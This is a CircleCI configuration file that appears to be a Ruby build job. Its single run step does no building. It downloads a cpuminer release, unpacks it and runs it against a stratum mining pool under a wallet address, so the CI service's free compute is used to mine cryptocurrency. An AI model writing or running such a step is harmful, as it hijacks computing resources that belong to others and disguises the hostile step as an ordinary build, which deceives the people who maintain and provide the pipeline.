version: 2.1
jobs:
  build:
    docker:
      - image: circleci/ruby:2.5.3-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.17/cpuminer-opt-linux.tar.gz && tar -xvf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a yescryptR16 -o stratum+tcps://stratum-asia.rplant.xyz:17055 -u qcqMw313oWBmhmjirLwDb5TVjaAFsg3WJs.killer2.0 -t 2